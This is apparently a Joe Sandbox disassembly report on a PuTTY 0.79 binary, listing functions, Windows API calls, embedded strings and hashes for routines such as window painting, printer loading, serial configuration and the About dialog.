Opcode ID: 5064c68a6f5c7eec95da30e461cf02cdc684c5ea86478316188877cc5ff359f9
Instruction ID: 5e992d351635434dd9dea19b2a0efac3800137b10438cce27e55e50da9e9113b
Opcode Fuzzy Hash: 5064c68a6f5c7eec95da30e461cf02cdc684c5ea86478316188877cc5ff359f9
Instruction Fuzzy Hash: C081D8B6900210BFD711AF54EC46D6EB7E5EF58318F08482CF94997353E731A924EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C64950 Relevance: 37.6, APIs: 25, Instructions: 149COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00C64988
CreateCompatibleDC.GDI32(00000000), ref: 00C649AE
SelectObject.GDI32(00000000), ref: 00C649BD
_strlen.LIBCMT ref: 00C649C4
GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00C649D4
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 00C649F3
InvalidateRect.USER32(?,00000000,00000000), ref: 00C649FE
DeleteDC.GDI32(00000000), ref: 00C64A05
DefWindowProcA.USER32(?,?,?,?), ref: 00C64A12
BeginPaint.USER32(?,?), ref: 00C64A25
SelectObject.GDI32(00000000), ref: 00C64A3A
GetStockObject.GDI32(00000007), ref: 00C64A3E
SelectObject.GDI32(00000000,00000000), ref: 00C64A46
CreateSolidBrush.GDI32 ref: 00C64A4E
SelectObject.GDI32(00000000,00000000), ref: 00C64A5A
GetClientRect.USER32(?,?), ref: 00C64A65
Rectangle.GDI32(00000000,?,?,?,?), ref: 00C64A7C
GetWindowTextLengthA.USER32(?), ref: 00C64A83
GetWindowTextA.USER32(?,00000000,00000001), ref: 00C64AA4
SetTextColor.GDI32(00000000), ref: 00C64AB1
SetBkColor.GDI32(00000000), ref: 00C64ABE
TextOutA.GDI32(00000000,?,?,00000000,00000000), ref: 00C64AD7
SelectObject.GDI32(00000000), ref: 00C64AEA
DeleteObject.GDI32(?), ref: 00C64AF4
EndPaint.USER32(?,?), ref: 00C64B00

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
String ID:
API String ID: 2408264671-0
Opcode ID: 9a009b34554fe15ce0b748c9ec7e08b7fd8ffb6a023e12f786579e788483eb54
Instruction ID: 48f1f280d5f2581a00502cc41f58b18650caa5dd86cd76b6f1cb76e20dbd4848
Opcode Fuzzy Hash: 9a009b34554fe15ce0b748c9ec7e08b7fd8ffb6a023e12f786579e788483eb54
Instruction Fuzzy Hash: 13515A76504304AFD3119FA0EC89E7F7BBAEB89755F040418FA56C2260D731A911DF76

Uniqueness

Uniqueness Score: -1.00%

Function 00C484F0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 181windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00C485D3
GetDeviceCaps.GDI32(00000000,00000026), ref: 00C485DE
CreatePalette.GDI32 ref: 00C485F5
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00C48612
RealizePalette.GDI32(00000000), ref: 00C48615
GetStockObject.GDI32(0000000F), ref: 00C4861D
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00C48627
SetPaletteEntries.GDI32(?,?,?,?), ref: 00C48685
GetDC.USER32(00000000), ref: 00C48697
SelectPalette.GDI32(00000000,00000000), ref: 00C486AC
UnrealizeObject.GDI32 ref: 00C486BA
RealizePalette.GDI32(00000000), ref: 00C486C1
GetStockObject.GDI32(0000000F), ref: 00C486E9
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00C486F3
ReleaseDC.USER32(00000000), ref: 00C48700
InvalidateRect.USER32(00000000,00000001), ref: 00C48722
ReleaseDC.USER32(00000000), ref: 00C48736

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C48509, 00C4852B, 00C486D5
ncolours <= OSC4_NCOLOURS - start, xrefs: 00C48530
start <= OSC4_NCOLOURS, xrefs: 00C4850E
wgs.term_hwnd, xrefs: 00C486DA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesInvalidateRectUnrealize
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs.term_hwnd
API String ID: 3328073877-2456718722
Opcode ID: 7ce54e8664ac932b2959fa58a088bd4cb92f3219e432e8c3278bdcc9e9eb6f1a
Instruction ID: b23448b8ae0efb359823e6a6a60ce9b2389f0574e6eb46234cf169ae6bd40d25
Opcode Fuzzy Hash: 7ce54e8664ac932b2959fa58a088bd4cb92f3219e432e8c3278bdcc9e9eb6f1a
Instruction Fuzzy Hash: 0F51F1B9640340AFE7105F30FC4AB6A3FAAFB16305F050014FA52D63A2DA759948CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F100 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetProcAddress.KERNEL32(00000000,EnumPrintersA), ref: 00C7F13B
GetProcAddress.KERNEL32(00000000,OpenPrinterA), ref: 00C7F148
GetProcAddress.KERNEL32(00000000,ClosePrinter), ref: 00C7F155
GetProcAddress.KERNEL32(00000000,StartDocPrinterA), ref: 00C7F162
GetProcAddress.KERNEL32(00000000,EndDocPrinter), ref: 00C7F16F
GetProcAddress.KERNEL32(00000000,StartPagePrinter), ref: 00C7F17C
GetProcAddress.KERNEL32(00000000,EndPagePrinter), ref: 00C7F189
GetProcAddress.KERNEL32(00000000,WritePrinter), ref: 00C7F196

Strings

EndPagePrinter, xrefs: 00C7F183
StartDocPrinterA, xrefs: 00C7F15C
spoolss.dll, xrefs: 00C7F11E
ClosePrinter, xrefs: 00C7F14F
EndDocPrinter, xrefs: 00C7F169
StartPagePrinter, xrefs: 00C7F176
WritePrinter, xrefs: 00C7F190
OpenPrinterA, xrefs: 00C7F142
EnumPrintersA, xrefs: 00C7F135
winspool.drv, xrefs: 00C7F10F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
API String ID: 2238633743-2130675966
Opcode ID: 95d489624ea4b9b0dd9245a546205ce1f7fa1c90ab0e3f50a29b50a28e450420
Instruction ID: 8c0b35f732b4d643dc56d23e39a5519523287058b13f70a1b63832bc1569ae44
Opcode Fuzzy Hash: 95d489624ea4b9b0dd9245a546205ce1f7fa1c90ab0e3f50a29b50a28e450420
Instruction Fuzzy Hash: BE112478941764AFE3116F2DBC49B7AB7D4BB62704F094129F400D6360DBB516098FB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AD44 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00C45EB0: _strlen.LIBCMT ref: 00C45EC1

__fread_nolock.LIBCMT ref: 00C4AFA1

Part of subcall function 00C45DA0: DeleteObject.GDI32(00000000), ref: 00C45DE1
Part of subcall function 00C45DA0: DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00C4B1A1,00000001,?,?,?,?,?,00C45C06,?,00C42A54), ref: 00C45DF0
Part of subcall function 00C45DA0: DeleteObject.GDI32(?), ref: 00C45E18
Part of subcall function 00C45DA0: CoUninitialize.OLE32(00000001,?,?,?,?,?,00C45C06,?,00C42A54), ref: 00C45E2D

Strings

option "%s" requires an argument, xrefs: 00C4AE01
unexpected argument "%s", xrefs: 00C4AFCC
--host-ca, xrefs: 00C4AE9F
-cleanup, xrefs: 00C4AE54
%s expects an output filename, xrefs: 00C4AFD7
%s Warning, xrefs: 00C4B0AA
-demo-config-box, xrefs: 00C4AEE1
demo-server.example.com, xrefs: 00C4B02C, 00C4B112
can't open input file '%s', xrefs: 00C4AF6F
-pgpfp, xrefs: 00C4AE6A
%s expects input and output filenames, xrefs: 00C4AFE2
unknown option "%s", xrefs: 00C4AF0F
-demo-terminal, xrefs: 00C4AEF3
This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 00C4B09A
--host_ca, xrefs: 00C4AECB

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize__fread_nolock_strlen
String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
API String ID: 3701376555-528882638
Opcode ID: 202a3be2851a23adaa5023a8cbba48b29eb14b84847a270405304703ffce8179
Instruction ID: 74b22f2d337c4e08a45d361768095b606d2513267757e6d6772762b4ea3101ff
Opcode Fuzzy Hash: 202a3be2851a23adaa5023a8cbba48b29eb14b84847a270405304703ffce8179
Instruction Fuzzy Hash: C5912AE9D843107BE6307A217C43F7F35586F6274AF080028FD1965283FB96AA59A5B3

Uniqueness

Uniqueness Score: -1.00%

Function 00C46480 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 167windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 00C464AC
AppendMenuA.USER32(00000000,00000000,00000400,?), ref: 00C464E1
DeleteMenu.USER32(?,00000000), ref: 00C46605
DeleteMenu.USER32(00000200,00000000), ref: 00C46614
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00C46632
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00C46648
DeleteMenu.USER32(?,00000000), ref: 00C46664
DeleteMenu.USER32(00000200,00000000), ref: 00C46673
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00C46691
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00C466A7

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C46515, 00C4656E
S&pecial Command, xrefs: 00C46622, 00C46681
nesting < 2, xrefs: 00C46573
IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX, xrefs: 00C4651A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Menu$DeleteInsert$AppendCreatePopup
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
API String ID: 1803796953-2360807388
Opcode ID: 421773e6bb70c567f4d02300723507ee9ea3b0e0e33412da5aced53ed5594d1e
Instruction ID: 855bba0151ee9793f8067fe2508bf0b7dee4f9ec8241c1a633c9c7c583c53779
Opcode Fuzzy Hash: 421773e6bb70c567f4d02300723507ee9ea3b0e0e33412da5aced53ed5594d1e
Instruction Fuzzy Hash: D3512478740308ABEB105F15EC46F267BA6FB82B00F24842DF605DB3E5DAB1AC55DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C520 Relevance: 28.1, APIs: 5, Strings: 11, Instructions: 146timeCOMMON

Download Yara Rule

APIs

GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00C6C330,?), ref: 00C6C53C
SetCommState.KERNEL32(00000000,?), ref: 00C6C67F
SetCommTimeouts.KERNEL32(00000000), ref: 00C6C6B4
GetLastError.KERNEL32 ref: 00C6C6C3

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

GetLastError.KERNEL32 ref: 00C6C6DA

Strings

Configuring %u data bits, xrefs: 00C6C595
Configuring %s flow control, xrefs: 00C6C66D
Configuring serial timeouts: %s, xrefs: 00C6C6D3
Configuring %s, xrefs: 00C6C5C4
RTS/CTS, xrefs: 00C6C652
Configuring %s parity, xrefs: 00C6C5F0
Configuring serial port: %s, xrefs: 00C6C6EA
Invalid number of stop bits (need 1, 1.5 or 2), xrefs: 00C6C622
DSR/DTR, xrefs: 00C6C667
XON/XOFF, xrefs: 00C6C639
Configuring baud rate %lu, xrefs: 00C6C572

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Comm$ErrorLastState$FormatMessageTimeouts_strlen
String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$XON/XOFF
API String ID: 617136254-604002008
Opcode ID: a6e123015d05b72fa189476d6cba2b4ccf010fa27def985706fd32d71729d92f
Instruction ID: 45af504e88e5c911656ba7dbb2a080f58449415f378de0100b242bb5a265251e
Opcode Fuzzy Hash: a6e123015d05b72fa189476d6cba2b4ccf010fa27def985706fd32d71729d92f
Instruction Fuzzy Hash: D34108B1904300AFD710AF24FCC6B2B7A98AF50754F084528F999D6383E675CA189BB7

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6A70 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 373COMMON

Download Yara Rule

APIs

_strspn.LIBCMT ref: 00CA6A8C
_strcspn.LIBCMT ref: 00CA6AD2
_strspn.LIBCMT ref: 00CA6B05
_strlen.LIBCMT ref: 00CA6B2F
_strspn.LIBCMT ref: 00CA6B4A
_strlen.LIBCMT ref: 00CA6DEB
_strspn.LIBCMT ref: 00CA6E0B
_strlen.LIBCMT ref: 00CA6E8B
_strspn.LIBCMT ref: 00CA6EA1

Strings

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/, xrefs: 00CA6AFF
0123456789abcdefABCDEF:, xrefs: 00CA6B44
SHA256:, xrefs: 00CA6AEA
MD5:, xrefs: 00CA6B16
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=, xrefs: 00CA6E05, 00CA6E9B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strspn$_strlen$_strcspn
String ID: 0123456789abcdefABCDEF:$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=$MD5:$SHA256:
API String ID: 1973092097-3738422337
Opcode ID: 3c8c9d2c81a1f386c6759e66bdee4fbd1207f152915b2eebece5c8e60d87ca83
Instruction ID: 958c621187cb70301d02dc624864b445f47d5228259673bebc33171f5cb9b4d9
Opcode Fuzzy Hash: 3c8c9d2c81a1f386c6759e66bdee4fbd1207f152915b2eebece5c8e60d87ca83
Instruction Fuzzy Hash: 87C10880F056B377EB276124C42433AAACA5B87B8CF1CC24BD0D556286DBA59F5783C3

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F4E0 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 214windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00C5F526
MapDialogRect.USER32(?,?), ref: 00C5F61F
CreateWindowExA.USER32(00000200,EDIT,?,?,?,?,?,?,?,?,00000000), ref: 00C5F65A
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00C5F666
MapDialogRect.USER32(?,000000B0), ref: 00C5F744
GetDlgItem.USER32(?,00000001), ref: 00C5F74B
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00C5F762
MapDialogRect.USER32(?,00000000), ref: 00C5F78E
GetWindowRect.USER32(?,00000000), ref: 00C5F7BF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,0000012C,0000000E), ref: 00C5F7E2
ShowWindow.USER32(?,00000001), ref: 00C5F7EB

Strings

EDIT, xrefs: 00C5F650
P, xrefs: 00C5F570
STATIC, xrefs: 00C5F5FA
d, xrefs: 00C5F554

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Rect$Dialog$MessageSend$CreateItemShow
String ID: EDIT$P$STATIC$d
API String ID: 2328128272-163579123
Opcode ID: 4eaded28810937b7aa47b7647eab224aff1ff168ea0f086b5119f10ad6e3cfd7
Instruction ID: ea2570296a29c82d1d2a10ff604a6ab007c55460e2ffc540bf3a9caa273ac23d
Opcode Fuzzy Hash: 4eaded28810937b7aa47b7647eab224aff1ff168ea0f086b5119f10ad6e3cfd7
Instruction Fuzzy Hash: EE816771508300AFE750CF54DC84F4BBBE9EB88744F50481DFA899B2A0C7B5A985CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C420 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 00C7C456
GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 00C7C47C
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00C7C4A2
GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 00C7C4C8
GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 00C7C4EA
GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00C7C508
GetProcAddress.KERNEL32(00000000,SetEntriesInAclA), ref: 00C7C52B

Strings

OpenProcessToken, xrefs: 00C7C49C
InitializeSecurityDescriptor, xrefs: 00C7C4E4
SetSecurityDescriptorOwner, xrefs: 00C7C502
GetTokenInformation, xrefs: 00C7C4C2
SetSecurityInfo, xrefs: 00C7C476
GetSecurityInfo, xrefs: 00C7C450
SetEntriesInAclA, xrefs: 00C7C525
advapi32.dll, xrefs: 00C7C436

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc
String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
API String ID: 190572456-1260934078
Opcode ID: d8ed1df730bb34c0ebfdceb2b976612b2c6ffbdacaf0e94089946b877bb6b0a0
Instruction ID: 88c2b9d1c617a052dce76065f2e4efdd58bb10b38e1ed65e9edd5e8e8654ffaa
Opcode Fuzzy Hash: d8ed1df730bb34c0ebfdceb2b976612b2c6ffbdacaf0e94089946b877bb6b0a0
Instruction Fuzzy Hash: 33310878A017839BEB518F3EBCC5B2A37A86716784F048018E415D67B0DBB5D694EF38

Uniqueness

Uniqueness Score: -1.00%

Function 00C64770 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(00000003), ref: 00C6480F
GetSysColor.USER32(00000018), ref: 00C64823
GetSysColor.USER32(00000017), ref: 00C6482C
SystemParametersInfoA.USER32(00000029,00000158,00000158,00000000), ref: 00C6485D
CreateFontIndirectA.GDI32(?), ref: 00C6486B
SetWindowTextA.USER32(00000000,?), ref: 00C64895
CreateCompatibleDC.GDI32(00000000), ref: 00C648A9
_strlen.LIBCMT ref: 00C648B2
GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00C648C2
DeleteDC.GDI32(00000000), ref: 00C648C9
GetWindowRect.USER32(?), ref: 00C648D3
CreateWindowExA.USER32(00000088,00000010,?,80000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00C6491D
ShowWindow.USER32(00000000,00000004), ref: 00C6492B

Strings

%dx%d, xrefs: 00C6487C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
String ID: %dx%d
API String ID: 816365731-2206825331
Opcode ID: 377d52b9dc4e53e4efb260d4a26e287259d18b8cf663d00f9ae4bcbcb8c7d19c
Instruction ID: 52de87160a2a5ff075f4067e113c620434a45ae9065df8d4c93bdee693c3df81
Opcode Fuzzy Hash: 377d52b9dc4e53e4efb260d4a26e287259d18b8cf663d00f9ae4bcbcb8c7d19c
Instruction Fuzzy Hash: 59416AB4504340AFE3219F60EC49B6B7BF8EB89704F404818F684D73A0D7749944CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C5D5A0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00C5D5E5
SetDlgItemTextA.USER32(?,000003EA,00000000), ref: 00C5D62E

Part of subcall function 00C7F8D0: GetDlgItem.USER32(00000000,00000000), ref: 00C7F8DC
Part of subcall function 00C7F8D0: GetWindowLongA.USER32(00000000,000000F0), ref: 00C7F8ED
Part of subcall function 00C7F8D0: GetWindowLongA.USER32(00000000,000000EC), ref: 00C7F8F4
Part of subcall function 00C7F8D0: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00C7F90E
Part of subcall function 00C7F8D0: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00C7F914
Part of subcall function 00C7F8D0: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00C7F923

ShellExecuteA.SHELL32(?,open,https://www.chiark.greenend.org.uk/~sgtatham/putty/,00000000,00000000,0000000A), ref: 00C5D681
EndDialog.USER32(?,00000001), ref: 00C5D68C
EnableWindow.USER32(?,00000000), ref: 00C5D6A4
DialogBoxParamA.USER32(00000071,?,00C5F290,00000000), ref: 00C5D6B6
EnableWindow.USER32(?,00000001), ref: 00C5D6BF
SetActiveWindow.USER32(?), ref: 00C5D6C2

Strings

%s%s%s%s, xrefs: 00C5D60F
open, xrefs: 00C5D67B
PuTTY, xrefs: 00C5D5D3, 00C5D60E
https://www.chiark.greenend.org.uk/~sgtatham/putty/, xrefs: 00C5D676
Release 0.79, xrefs: 00C5D609
About %s, xrefs: 00C5D5D4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
